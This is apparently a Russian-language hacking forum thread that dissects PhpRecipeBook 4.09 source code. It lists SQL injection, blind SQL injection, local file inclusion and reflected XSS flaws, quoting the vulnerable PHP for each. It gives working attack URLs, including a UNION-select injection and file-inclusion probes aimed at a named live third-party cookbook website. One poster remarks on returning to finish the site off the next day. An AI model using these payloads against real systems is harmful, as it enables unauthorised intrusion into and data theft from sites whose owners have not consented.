Уязвимость : SQL Файл modules\recipes\search.php PHP: if ($_REQUEST["course_id"]) $query .= " recipe_course=" . $_REQUEST["course_id"] . " AND"; if ($_REQUEST["base_id"]) $query .= " recipe_base=" . $_REQUEST["base_id"] . " AND"; if ($_REQUEST["ethnic_id"]) $query .= " recipe_ethnic=" . $_REQUEST["ethnic_id"] . " AND"; if ($_REQUEST["time_id"]) $query .= " recipe_prep_time=" . $_REQUEST["time_id"] . " AND"; if ($_REQUEST["difficult_id"]) $query .= " recipe_difficulty=" . $_REQUEST["difficult_id"] . " AND"; Запрос там выше, искать времени нету __http://www.bergiescookbook.com/cookbook/index.php?m=recipes&a=search&search=yes&base_id=-10+union+select+1,version(),3,4,5,6,7-- Уязвимость : LFI Условия :MQ=off Файл index.php PHP: $m = isset( $_GET['m'] ) ? $_GET['m'] : 'recipes'; $a = isset( $_GET['a'] ) ? $_GET['a'] : 'index'; include "modules/$m/$a.php"; __http://www.bergiescookbook.com/cookbook/index.php?m=recipes'&a=search'&search=yes&base_id=10 Ушел спать, время многО, завтра добью
Уязвимоть : Blind -SQL Файл : modules\recipes\view.php PHP: $recipe_id = isset( $_GET['recipe_id'] ) ? $_GET['recipe_id'] : 0; $show_ratings = isset ($_GET['show_ratings'] ) ? true : false; $show_ratings = isset($_GET['show_ratings']) ? isset($_GET['show_ratings']) : $g_rb_show_ratings; #Construct the Query and do most of the setup first, the print html $sql = "SELECT $db_table_recipes.*, ethnic_desc, base_desc, course_desc, time_desc, difficult_desc, user_name FROM $db_table_recipes LEFT JOIN $db_table_ethnicity ON ethnic_id = recipe_ethnic LEFT JOIN $db_table_bases ON base_id = recipe_base LEFT JOIN $db_table_courses ON course_id = recipe_course LEFT JOIN $db_table_prep_time ON time_id = recipe_prep_time LEFT JOIN $db_table_difficulty ON difficult_id = recipe_difficulty LEFT JOIN $db_table_users ON user_login = recipe_owner WHERE recipe_id = $recipe_id"; Уязвимость : LFI PHP: if (!empty( $_REQUEST['dosql'] )) { include "modules/$m/".$_REQUEST['dosql'].".php"; __http://www.bergiescookbook.com/cookbook/index.php?dosql=' Уязвимость pXSS PHP: <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass"><?php echo $LangUI->_('Mass');?></a> | <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume"><?php echo $LangUI->_('Volume');?></a> | <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume2mass"><?php echo $LangUI->_('Volume to mass');?></a> | <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass2volume"><?php echo $LangUI->_('Mass to volume');?></a> | <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=temperature"><?php echo $LangUI->_('Temperature');?></a> Лично из за этого кода я и попер смареть xss я прав?? _http://www.bergiescookbook.com/cookbook/index.php?m=utils&a=converter&type=volume/%3E%3Cscript%3Ealert(/%C1%F3%EA%E8%ED%E0%F2%EE%F0/)%3C/script%3E
PhpRecipeBook 4.09 SQL injection Уязвимый post - параметр:sm_login_id Заисимости: mq = off Вектор: union-query Уязвимый код: PHP: $sm_login_id = isset( $_POST['sm_login_id'] ) ? $_POST['sm_login_id'] : ''; $sm_password = isset( $_POST['sm_password'] ) ? $_POST['sm_password'] : ''; if ($sm_login_id != "") { // try login if they are passing us a login ID if (!$SMObj->login($sm_login_id,$sm_password)) { $SMObj->addErrorMsg($SMObj->_('Login Failed! Please try again.')); } } Функция login : PHP: function login($login='',$password='') { if ($login=="" && $login=="") { $login = $this->_autoLoginUser; $password = $this->_autoLoginPasswd; } $sql = "SELECT * FROM " . $this->_db_table_prefix . $this->_db_table_users . " WHERE user_login = '$login' AND user_password = '" . md5($password) . "'"; Exploit: passive XSS(reflected) Уязвимый параметр:keywords Заисимости: mq = off Уязвимый код: PHP: <input type="text" name="keywords" class="field_textbox" value="<?php echo $keywords;?>"> Exploit: [127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords="><script>alert('Antichat')</script>&search=yes]
